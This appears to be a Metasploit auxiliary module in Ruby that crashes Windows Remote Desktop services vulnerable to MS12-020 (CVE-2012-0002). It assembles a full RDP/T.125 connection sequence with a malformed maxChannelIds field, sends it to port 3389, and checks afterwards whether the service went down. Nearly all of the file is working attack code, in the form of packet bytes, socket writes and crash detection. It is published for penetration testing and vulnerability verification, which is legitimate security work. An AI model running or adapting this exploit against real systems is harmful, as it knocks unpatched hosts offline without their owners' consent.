
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
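# Auxiliary DoS module for MS12-020 (CVE-2012-0002).
#
# Sends a single hand-assembled RDP connection sequence whose T.125
# ConnectMCSPDU carries the maxChannelIds value that the description names as
# the mishandled field, then re-probes the port to decide whether the service
# went down. The probe before and after is a bare TCP connect, not an RDP
# handshake, so "up"/"down" here means "port accepts connections" only.
# The fix for affected hosts is the MS12-020 update referenced below.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the RPORT option; no network activity here.
  #
  # @param info [Hash] extra module info merged via +update_info+
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',
      'Description' => %q{
        This module exploits the MS12-020 RDP vulnerability originally discovered and
        reported by Luigi Auriemma. The flaw can be found in the way the T.125
        ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result
        an invalid pointer being used, therefore causing a denial-of-service condition.
      },
      'References' =>
        [
          [ 'CVE', '2012-0002' ],
          [ 'MSB', 'MS12-020' ],
          [ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],
          [ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
          [ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
          [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
          [ 'EDB', '18606' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]
        ],
      'Author' =>
        [
          'Luigi Auriemma',
          'Daniel Godas-Lopez', # Entirely based on Daniel's pastie
          'Alex Ionescu',
          'jduck',
          '#ms12-020' # Freenode IRC
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2012-03-16'
    ))

    register_options(
      [
        Opt::RPORT(3389)
      ]
    )
  end

  # Reachability probe: opens and immediately closes a TCP connection to
  # RHOST:RPORT. Nothing is sent, so this says nothing about RDP itself.
  #
  # @return [Boolean] true when the connect succeeded, false when the target
  #   refused, timed out or was otherwise unreachable
  def is_rdp_up
    connect
    disconnect
    true
  rescue Rex::ConnectionError
    # Rex::ConnectionError is the parent of Rex::ConnectionRefused and
    # Rex::ConnectionTimeout (the two the original rescued) and of the
    # host-unreachable / proxy variants, which previously escaped as an
    # uncaught exception instead of counting as "not up".
    false
  end

  # Checks the port, sends the crafted sequence once, waits, and reports a
  # vulnerability only if the port no longer accepts connections afterwards.
  def run
    max_channel_ids = "\x02\x01\xff"
    pkt = build_packet(max_channel_ids)

    unless is_rdp_up
      print_error("#{rhost}:#{rport} - RDP Service Unreachable")
      return
    end

    connect
    print_status("#{rhost}:#{rport} - Sending #{self.name}")
    sock.put(pkt)
    Rex.sleep(3) # pause before tearing the connection down and re-probing
    disconnect
    # bytesize rather than length: the buffer is raw protocol bytes, not characters
    print_status("#{rhost}:#{rport} - #{pkt.bytesize} bytes sent")

    print_status("#{rhost}:#{rport} - Checking RDP status...")

    if is_rdp_up
      # A successful probe here means the service survived; the original
      # message repeated "Unreachable", which said the opposite.
      print_error("#{rhost}:#{rport} - RDP Service still reachable, target does not appear affected")
      return
    end

    print_good("#{rhost}:#{rport} seems down")
    report_vuln(
      host: rhost,
      port: rport,
      name: self.name,
      refs: self.references,
      info: "Module #{self.fullname} successfully crashed the target system via RDP"
    )
  end

  private

  # One T.125 DomainParameters SEQUENCE (tag 0x30, 25 content bytes). The
  # connect-initial carries it three times (target, minimum and maximum
  # parameters) with identical content; maxChannelIds is supplied by the
  # caller because it is the field the module description identifies.
  #
  # @param max_channel_ids [String] encoded maxChannelIds INTEGER (tag, length, value)
  # @return [String] raw bytes of the sequence
  def domain_parameters(max_channel_ids)
    [
      "\x30\x19",         # SEQUENCE, length 0x19
      max_channel_ids,    # maxChannelIds
      "\x02\x01\xFF",     # maxUserIds
      "\x02\x01\x00",     # maxTokenIds
      "\x02\x01\x01",     # numPriorities
      "\x02\x01\x00",     # minThroughput
      "\x02\x01\x01",     # maxHeight
      "\x02\x02\x00\x7C", # maxMCSPDUsize
      "\x02\x01\x02"      # protocolVersion
    ].join
  end

  # Assembles the full on-the-wire byte string: an X.224 connection request,
  # an MCS connect-initial holding the domain parameters, eight identical
  # short T.125 PDUs and two closing T.125 PDUs, each in its own TPKT header.
  # TPKT length bytes are kept from the original hand-assembled packet and
  # are not recomputed.
  #
  # @param max_channel_ids [String] encoded maxChannelIds placed in the connect-initial
  # @return [String] raw bytes to write to the socket
  def build_packet(max_channel_ids)
    params = domain_parameters(max_channel_ids)

    connection_request =
      "\x03\x00\x00\x13" + # TPKT: version + length
      "\x0E\xE0\x00\x00" + # X.224 (connection request)
      "\x00\x00\x00\x01" +
      "\x00\x08\x00\x00" +
      "\x00\x00\x00"

    connect_initial =
      "\x03\x00\x00\x6A" + # TPKT: version + length
      "\x02\xF0\x80" +     # X.224 (connect-initial)
      "\x7F\x65\x82\x00" + # T.125
      "\x5E" +
      "\x04\x01\x01" +     # callingDomainSelector
      "\x04\x01\x01" +     # calledDomainSelector
      "\x01\x01\xFF" +     # upwardFlag
      params +             # targetParameters
      params +             # minimumParameters
      params +             # maximumParameters
      "\x04\x82\x00\x00"   # userData

    # The original repeats this 8-byte unit eight times back to back.
    short_pdu =
      "\x03\x00\x00\x08" + # TPKT: version + length
      "\x02\xF0\x80" +     # X.224
      "\x28"               # T.125

    trailer =
      "\x03\x00\x00\x0C" + # TPKT: version + length
      "\x02\xF0\x80" +     # X.224
      "\x38\x00\x06\x03" + # T.125
      "\xF0" +
      "\x03\x00\x00\x09" + # TPKT: version + length
      "\x02\xF0\x80" +     # X.224
      "\x21\x80"           # T.125

    connection_request + connect_initial + (short_pdu * 8) + trailer
  end
end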